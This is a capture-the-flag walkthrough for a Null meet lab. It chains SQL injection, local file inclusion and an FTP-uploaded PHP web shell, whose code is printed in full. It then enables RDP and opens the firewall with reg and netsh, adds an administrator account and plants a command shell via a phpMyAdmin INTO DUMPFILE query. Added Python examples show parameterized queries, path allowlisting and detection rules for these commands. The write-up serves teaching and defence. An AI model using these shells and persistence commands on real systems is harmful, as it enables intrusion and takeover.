Cracking CTFs The Sysbypass CTF


A CTF I had created for the monthly Bangalore Null Meets.


Cracking CTFs - Sysbypass CTF
The Walkthrough
Riyaz Walikar a.k.a karniv0re
http://www.riyazwalikar.com

This is the third Capture the Flag setup in a series of games that I wrote for the Null meets. The aim of this CTF was to read the contents of a file called flag.txt. The start address was provided to be http://. The major breakthroughs are separated into levels along with a makeshift title for each one of them.

Level 1 - Bypassing Login

The application landing page consisted of a login page. Since no usernames were known, an attempt was made to identify one via the source code and via the error message. This did not yield any results.

The page was then tested for SQL injection and was found to be vulnerable. The error message that was generated also showed the path of the application directory. The application was being run on XAMPP Lite.
Using different combinations of username or 1=1 -- still gave errors. Finally, entering admin) -- in the username field gave instant access into the application.

Level 2 - Local File Inclusion

The application, post login bypass, was a simple page with a drop-down box having 4 colors as options (White, Red, Green, Blue).
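The login bypass above works because user input is spliced into the SQL text. The CTF's actual login query is not shown on the page, so the following is an added illustration (not the CTF's code) using a constructed SQLite users table and a constructed payload of the "or 1=1 --" family that Level 1 describes: the concatenated query accepts it, the parameterized query treats the same string as an ordinary (non-matching) username.

```python
import sqlite3

def make_db():
    # Constructed demo database; the CTF's real schema is not on the page.
    # Plaintext password kept only for brevity: a real table stores a salted hash.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # String concatenation: the input becomes part of the SQL grammar, so a quote
    # plus a comment marker ends the WHERE clause early and the password is never checked.
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    # Bound parameters: values travel separately from the statement text, so quotes,
    # parentheses and comment sequences stay data and cannot change the query.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

def demo():
    conn = make_db()
    payload = "admin' OR 1=1 --"   # constructed payload of the kind tried in Level 1
    return {
        "vulnerable": login_vulnerable(conn, payload, "wrong"),   # bypassed
        "safe": login_safe(conn, payload, "wrong"),               # rejected
        "safe_valid": login_safe(conn, "admin", "S3cret!"),       # real credentials still work
    }

if __name__ == "__main__":
    print(demo())
```

The same change also removes the second finding of Level 1: a parameterized query does not produce a syntax error on odd input, so there is no error message carrying the application path. Disabling display_errors in production closes that disclosure independently.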
When a color is selected, the page sends the name of the color via a GET request and the page background color changes. Any other string passed as the color variable results in the page color changing to white. By trial and error it was found that the application reads the <body bgcolor=green> string from files in the application directory. Four text files were found, called white.txt, red.txt, green.txt and blue.txt.

It was hence deduced that the application appends .txt to the variable passed to color via the GET request and attempts to open and read the contents of the file. If the file doesn't exist, the application defaults to a white background.

An attempt was then made to read other files on the hard drive. Assuming the backend OS to be Windows, an attempt was made to read the C:\boot.ini file.
The null byte at the end of the query string was added to terminate the string so that the OS does not read the file as boot.ini.txt (the .txt being appended by the application). Since we could now make the application open and read files we wanted, an obvious attempt was made to read a file that contained an application shell, providing command execution via GET or POST requests. The application did not contain any other pages and did not support the PUT method; hence an alternative method of uploading files had to be found.

Level 3 - FTP File Upload

A quick nmap scan with version detection showed a Microsoft FTP server running on port 4242. A more intense version detection scan showed that the FTP server supported anonymous logins. FileZilla was used to connect and upload the shell as shown in the screenshots below.
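The color parameter of Level 2 is a file name in disguise: the application appends ".txt" and opens whatever results, so "../" and a trailing null byte turn a four-option drop-down into an arbitrary file read. The following is an added example, not the CTF's PHP, written in Python against a constructed temporary directory tree: read_color_vulnerable mirrors the described behaviour (it escapes the application directory on "../secret"), while read_color_safe accepts only the four known names and additionally checks that the resolved path stays inside the base directory. Python itself refuses file names containing a NUL byte, so the null-byte truncation the walkthrough relied on cannot be reproduced here; the safe version rejects such input explicitly anyway.

```python
from pathlib import Path
import tempfile

ALLOWED_COLORS = ("white", "red", "green", "blue")   # the four options the CTF page offers

def read_color_vulnerable(base_dir, color):
    # Mirrors the page's description: append ".txt" to the raw parameter and open it.
    # Nothing stops "../" from walking out of base_dir.
    path = Path(base_dir) / (color + ".txt")
    try:
        return path.read_text()
    except (OSError, ValueError):
        return None   # the CTF application falls back to a white background here

def read_color_safe(base_dir, color):
    # Defence in depth: a strict allowlist (the only four values that are meaningful)
    # plus a containment check on the fully resolved path.
    if "\x00" in color or color.lower() not in ALLOWED_COLORS:
        return None
    base = Path(base_dir).resolve()
    target = (base / (color.lower() + ".txt")).resolve()
    if base not in target.parents:
        return None
    return target.read_text()

def demo():
    # Constructed layout: <tmp>/app holds the color files, <tmp>/secret.txt stands in for
    # a file outside the web directory (the role boot.ini played in the walkthrough).
    root = Path(tempfile.mkdtemp())
    app = root / "app"
    app.mkdir()
    for c in ALLOWED_COLORS:
        (app / f"{c}.txt").write_text(f"<body bgcolor={c}>")
    (root / "secret.txt").write_text("outside the web directory")
    return {
        "vuln_green": read_color_vulnerable(app, "green"),
        "vuln_escape": read_color_vulnerable(app, "../secret"),
        "safe_green": read_color_safe(app, "green"),
        "safe_escape": read_color_safe(app, "../secret"),
        "safe_nul": read_color_safe(app, "green\x00"),
    }

if __name__ == "__main__":
    print(demo())
```

The allowlist alone would have been enough for this application; the resolved-path check is what protects code that legitimately has to accept a larger set of names.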
The default directory for Microsoft FTP is <drive>\inetpub\ftproot, where <drive> is the drive where IIS is installed. An attempt was then made to read the shell.txt file using the path

    ../../../../inetpub/ftproot/shell

The following is the content of the shell.txt file that was uploaded. This is a simple web application backdoor that executes the command passed via the text box. There are more complex shells available on the Internet that can perform other functions like file upload and download, file system functions and Windows registry manipulation.
    <html><body><br />
    <form method="post">
    <input type="text" name="cmd">
    <input type="submit" value="Execute!">
    <br />
    <h2>Command Output</h2>
    <pre>
    <?php
    if (isset($_POST['cmd'])) {
        $cmd = $_POST['cmd'];
        if (strlen($cmd) == 0) {
            $cmd = "true";
        }
        system($cmd);
        die;
    }
    ?>
    </pre></body></html>

The following screenshot shows the command input field.
OS commands can now be executed via this shell. Since the flag file was known to be flag.txt, an attrib command was run on the most common locations where the file could be found. These locations included C:\, the desktop directory of all the users on the system and the web application directory.

Since the flag was not found on the file system, it was possible that hints to the flag file could exist in the database. To find the name of and credentials for the database, a copy of the index.php file was made as index.txt in the same directory using copy index.php index.txt, to be read via the browser.

Level 4 - Discovering the DB Server

It was found that the database instance was running on a different server altogether. A quick nmap scan showed that all requests to the DB server were being filtered from my machine.
Since the application server was able to communicate with the DB server, it was evident that the application server was the only way to reach the database server.
Level 5 - Getting Remote Desktop Access

The nmap scan earlier had already shown that the RDP port 3389 was not open, as is evident below. A quick check was performed using the Windows reg command to verify whether RDP is turned on but is being blocked by the firewall. In Windows operating systems that run Terminal Services, the DWORD value fDenyTSConnections at HKLM\System\CurrentControlSet\Control\Terminal Server determines whether RDP is enabled or not. A value of 1 indicates RDP is turned off and a value of 0 turns the Remote Desktop Service on. A restart/logoff is not required in most cases to change the state of the Remote Desktop Service. The command to query the relevant key is as follows:

    reg query "HKLM\System\CurrentControlSet\Control\Terminal Server"

Using the reg command, it was possible to remotely enable Remote Desktop on the server via the web shell. The command to add/edit an entry in the Windows registry, in this case the relevant Terminal Server key, is as follows:

    reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /d 0 /t REG_DWORD /f

The above command adds/updates the fDenyTSConnections value, whose type is REG_DWORD, with data value 0. The /f switch tells the reg command to update the entry without asking for confirmation.
After running the command, the Remote Desktop Service is enabled, as evidenced by the output of another reg query. As explained before, a value of 0 for fDenyTSConnections enables the Remote Desktop Service.

An nmap scan was re-run to confirm whether the RDP service was visible over the network. However, nmap still showed port 3389 in the filtered state.
Using the command line program netsh.exe, it is possible to view/add/update Windows Firewall rules, amongst loads of other functionality that the program offers. The following command shows the current firewall rules enabled on the server:

    netsh firewall show config

The output clearly shows that the firewall allows connections only on port 80 and on any ports opened by the inetinfo.exe executable, which is also responsible for the ftpd service that was running on port 4242.
To connect via RDP, it was necessary to open port 3389 on the firewall using the command line. This can be achieved using netsh via the following command:

    netsh firewall set portopening TCP 3389

The netsh firewall show config output now contains the entry to allow connections on port 3389. A quick nmap scan shows the port to be open. We can then connect using mstsc and access the remote server.

To log in to the server via RDP, a valid user account is required, which can be obtained by creating users via the web shell. The newly created user can then be added to the administrators group to be able to log in to the server.
Level 6 - Creating users to connect via RDP

The following commands can be used to check the current users, create a new user and add him to the administrators group:

    net users
    net user riyaz pa55w0rd /add
    net localgroup administrators riyaz /add
    net user riyaz

Once the user, riyaz here, is added to the administrators group, we can connect to the remote server via RDP using the password pa55w0rd.
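From a defender's side, Levels 5 and 6 are a short, very recognisable sequence of process executions: reg add on fDenyTSConnections with data 0, netsh opening 3389, net user /add, net localgroup administrators /add, all spawned by the web server process rather than by an interactive administrator. The block below is an added example (not part of the walkthrough) of detection logic over constructed process-creation records modelled loosely on Windows 4688/Sysmon fields; the host name, parent image path and user are invented, the command lines are the ones on this page. Each rule fires on its command pattern, the severity is raised when the parent is a web server binary, and a second pass correlates the three rules into the "RDP enabled from a web shell" chain per host.

```python
import re
from collections import defaultdict

# Constructed events (host, parent image and user are invented); command lines are from Levels 5 and 6.
WEB = "C:\\xampplite\\apache\\bin\\httpd.exe"
EVENTS = [
    {"host": "APPSRV", "parent": WEB, "user": "APPSRV\\SYSTEM",
     "cmd": 'reg query "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server"'},
    {"host": "APPSRV", "parent": WEB, "user": "APPSRV\\SYSTEM",
     "cmd": 'reg add "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server" '
            '/v fDenyTSConnections /d 0 /t REG_DWORD /f'},
    {"host": "APPSRV", "parent": WEB, "user": "APPSRV\\SYSTEM",
     "cmd": "netsh firewall set portopening TCP 3389"},
    {"host": "APPSRV", "parent": WEB, "user": "APPSRV\\SYSTEM",
     "cmd": "net user riyaz pa55w0rd /add"},
    {"host": "APPSRV", "parent": WEB, "user": "APPSRV\\SYSTEM",
     "cmd": "net localgroup administrators riyaz /add"},
    # Benign interactive use: listing accounts from Explorer should not alert.
    {"host": "APPSRV", "parent": "C:\\Windows\\explorer.exe", "user": "APPSRV\\helpdesk",
     "cmd": "net user"},
]

# Parents that should never be spawning administration tools.
WEB_PARENTS = ("httpd.exe", "php-cgi.exe", "php.exe", "w3wp.exe", "inetinfo.exe")

RULES = [
    # reg add ... fDenyTSConnections ... /d 0 : Remote Desktop switched on via the registry
    ("rdp_enabled_via_registry",
     re.compile(r"\breg(\.exe)?\s+add\b.*fDenyTSConnections.*/d\s+0\b", re.I)),
    # legacy "netsh firewall" port opening or the newer advfirewall rule syntax
    ("firewall_port_opened",
     re.compile(r"\bnetsh(\.exe)?\s+(firewall\s+(set|add)\s+portopening|"
                r"advfirewall\s+firewall\s+add\s+rule)", re.I)),
    # net user <name> [<password>] /add : local account creation
    ("local_account_created",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b", re.I)),
    # net localgroup administrators <name> /add : local admin added
    ("added_to_administrators",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
]

def detect(events):
    """Return one alert per (event, rule) match; web-server parents raise severity."""
    alerts = []
    for ev in events:
        parent = ev["parent"].rsplit("\\", 1)[-1].lower()
        for name, pattern in RULES:
            if pattern.search(ev["cmd"]):
                alerts.append({"host": ev["host"], "rule": name,
                               "severity": "high" if parent in WEB_PARENTS else "medium",
                               "parent": parent, "cmd": ev["cmd"]})
    return alerts

def rdp_backdoor_chain(alerts):
    """Hosts on which registry, firewall and account-creation rules all fired: the Level 5/6 sequence."""
    needed = {"rdp_enabled_via_registry", "firewall_port_opened", "local_account_created"}
    by_host = defaultdict(set)
    for a in alerts:
        by_host[a["host"]].add(a["rule"])
    return sorted(h for h, rules in by_host.items() if needed <= rules)

if __name__ == "__main__":
    found = detect(EVENTS)
    for a in found:
        print(a["severity"], a["rule"], "<-", a["cmd"])
    print("chain on:", rdp_backdoor_chain(found))
```

The parent-process condition is the strongest single signal here: none of these four commands has a legitimate reason to be a child of httpd.exe or inetinfo.exe, so that rule can alert on its own even when the registry or firewall pattern is varied.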
Level 7 - Reaching the DB Server

It is already known that the DB server would be reachable from the application server. A command line port scanner can be uploaded via mstsc using the Local Resources sharing option. We can use Foundstone's ScanLine command line port scanner with the -bp option to get service banners and to assume the system is up. Once sl.exe is copied to the application server, we can execute sl -bp against the DB server, via RDP or the web shell, to find its open ports.
ScanLine detected 2 open ports, 80 (HTTP) and 3306 (MySQL), on the DB server. The banners show more detailed output regarding the servers. Since port 80 is open, we can see what site is running using Internet Explorer on the application server. The DB server is running XAMPP Lite and phpMyAdmin is publicly accessible (default configuration). A quick check on the contents of all the databases was done to see if there is any information we could use to leverage our attack; however, no interesting information existed in the databases that could be used to gain system access.

Level 8 - Gaining a Shell on the DB Server

Using phpMyAdmin we can create a file on the server that can be used to execute commands on the server. The phpinfo() page available via the XAMPP home page shows the installation directory, where we can attempt to create a php file using the phpMyAdmin SQL query execution tab. The SQL query that can be used to create a php file that could execute OS commands on the DB server is as given below (in a MySQL string literal the backslashes of the Windows path must be doubled):

    select '<?php system($_GET["x"]); ?>' into dumpfile 'C:\\xampplite\\phpmyadmin\\cmd.php'
This creates a file called cmd.php in the phpMyAdmin directory that allows execution of OS commands. It can be executed by requesting cmd.php?x=<command> from 192.168.56.10. A dir command was run on the most common locations where the file could be found. These locations included the desktop directory of all the users on the system and the C drive. The flag.txt file was found in the root of the C drive using this method.
Level 9 - Reading the flag.txt file

Using the type command, the contents of C:\flag.txt can be read to the screen. The CTF is completed when the string "You know what the Goauld really want from us? Minnesota. Thats what. For the fishing mostly." is mailed to the creator of the CTF, that's me.

There are several different ways of reaching the flag.txt on the DB server. This walkthrough is just one of the most convenient and enlightening ways of doing it.

Riyaz Walikar a.k.a karniv0re
riyazwalikar@gmail.com